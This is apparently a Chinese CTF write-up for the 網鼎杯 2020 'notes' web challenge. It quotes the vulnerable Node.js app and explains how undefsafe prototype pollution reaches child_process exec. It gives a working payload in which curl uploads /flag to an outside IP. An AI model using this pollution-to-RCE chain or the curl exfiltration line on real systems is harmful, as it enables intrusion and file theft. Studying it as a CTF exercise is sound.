[網鼎杯 2020 青龍組]notes wp

corgi_m發表於2020-10-10

人生艱難，做了兩天。學到不少。
給了js程式碼。第一次做js題，賊難受。

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

閱讀程式碼找不到啥地方有問題，看了wp發現是exec，我就好奇了，exec再js中明明是字串相關的，咋成了命令執行了？

看了半天發現上面有require引入了child_process這個檔案，查閱資料發現這裡面是一個命令執行。

第一次遇到原型鏈汙染的問題，網上了解了原型鏈汙染的原理後，發現commands與note_list都是陣列物件的例項，他們的原型類肯定相同。

只要通過Notes類中的edit_note方法修改note_list的原型類的資料就可以汙染commands

上網查詢得知undefsafe正好有原型類汙染的漏洞，給id賦值__porto__就可以給原型了新增author 和 raw_note 兩個屬性。

因此，遍歷command的屬性的時候可以遍歷到這兩個屬性並執行。
所以再edit_note路由下post

id=__proto__.bb&author=curl -F ‘flag=@/flag’ 174.1.166.72:8080&raw=a
其中通過curl命令上傳內容為本地/flag檔案的名字為flag的檔案到攻擊機ip的8080埠。

此時commands的原型類已經被汙染，commands多了包含遠端請求的程式碼。
訪問/status路由執行命令。
通過RCE，監聽攻擊機的8080埠獲得上傳檔案的flag檔案中的內容獲得flag。

注意：buu無法訪問外網，需要用basic linuxlab的內網伺服器作為攻擊機接受上傳的資訊。

[網鼎杯 2020 青龍組]AreUSerialz
2024-11-11
[網鼎杯 2020 青龍組]AreUSerialz1
2024-11-07
2024網鼎杯初賽-青龍組-WEB gxngxngxn
2024-10-29
Web
第四屆“網鼎杯”網路安全大賽 - 青龍組
2024-10-30
[網鼎杯 2020 朱雀組]phpweb
2024-11-13
PHPWeb
[網鼎杯 2020 朱雀組]phpweb 1
2024-11-24
PHPWeb
BUUCTF [網鼎杯 2020 朱雀組] phpweb
2020-12-09
PHPWeb
祥雲杯2020 Crypto wp
2020-11-26
[網鼎杯 2018]Fakebook
2024-11-13
[極棒雲鼎杯2020] Web題
2020-07-15
Web
2024熵密杯wp
2024-10-07
熵
羊城杯2024WP
2024-10-04
網鼎杯 2024 玄武 pwn2 (kernel)
2024-11-19
網鼎杯-writeup-第二場-babyRSA
2018-08-24
[2019紅帽杯]easyRE WP
2024-10-27
王鼎杯 RCE命令執行五位元組限制
2024-06-23
2021年春秋杯網路安全聯賽秋季賽勇者山峰部分wp
2021-11-28
CUMTCTF'2020 已做wp
2020-09-25
Hackergame2020 wp
2020-11-15
GAM
第二屆隴劍杯初賽全WP
2024-10-24
24藍橋杯-網路安全組
2024-07-26
2020 10月CUMTCTF wp
2020-10-31
【wp】2020XCTF_逆向
2020-12-31
CUMTCTF'2020 未完成 wp
2020-10-04
[計組 notes] Chapter 3 儲存系統
2020-11-11
APT
2024騰龍杯-easy_Forensics
2024-11-17
2020MRCTF(Re)-Hard-to-go(WP)
2021-04-08
Go
2024年數字中國創新第四屆紅明谷杯網路安全大賽WP
2024-07-21
2020藍橋杯省賽B組C++(第二場)真題
2020-10-31
C++
openwrt 軟路由 docker安裝青龍皮膚 + Ninja
2022-03-03
路由Docker
ACM notes
2024-08-02
ACM
Typora Notes
2024-04-29
Mongodb Notes
2019-03-03
MongoDB
2020湖湘杯部分writeup
2020-11-02
2020亞太杯小記
2020-11-30
第二屆資料安全大賽“數信杯”資料安全大賽 WP
2024-07-21
藍橋杯模板（二）python組
2024-04-08
Python
藍橋杯模板（三）python組
2024-04-08
Python

[網鼎杯 2020 青龍組]notes wp

相關文章